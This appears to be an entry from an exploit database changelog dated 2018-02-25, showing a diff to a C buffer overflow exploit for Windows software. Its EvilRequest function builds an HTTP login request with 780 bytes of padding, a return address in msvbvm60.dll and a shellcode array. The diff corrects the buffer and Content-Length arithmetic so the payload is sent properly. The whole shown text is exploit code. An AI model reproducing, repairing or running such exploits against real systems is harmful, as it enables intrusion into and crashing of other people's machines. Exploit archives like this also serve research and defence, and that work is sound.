DB: 2018-02-25

1 changes to exploits/shellcodes

exploits/windows/dos/42341.c

@@ -62,9 +62,10 @@ void EvilRequest() {
                         "Content-Length: ";
     char request_two[] = "\r\n\r\nusername=";
     
-    char *padding = malloc(780);
-    memset(padding, 0x41, 780);
-    memset(padding + 778, 0x00, 2);
+    int initial_buffer_size = 780;
+    char *padding = malloc(initial_buffer_size);
+    memset(padding, 0x41, initial_buffer_size);
+    memset(padding + initial_buffer_size - 1, 0x00, 1);
     unsigned char retn[] = "\xcb\x75\x52\x73"; //ret at msvbvm60.dll
     
     unsigned char shellcode[] = 
@@ -96,10 +97,10 @@ void EvilRequest() {
 
     char request_three[] = "&password=A";
 
-    int buffer_length = strlen(request_one) + 780 + strlen(retn) + strlen(request_two) + strlen(shellcode) + strlen(request_three);
-    int content_length = 9 + 780 + strlen(retn) + strlen(shellcode) + strlen(request_three);
+    int content_length = 9 + strlen(padding) + strlen(retn) + strlen(shellcode) + strlen(request_three);
     char *content_length_string = malloc(15);
     sprintf(content_length_string, "%d", content_length);
+    int buffer_length = strlen(request_one) + strlen(content_length_string) + initial_buffer_size + strlen(retn) + strlen(request_two) + strlen(shellcode) + strlen(request_three);
 
     char *buffer = malloc(buffer_length);
     memset(buffer, 0x00, buffer_length);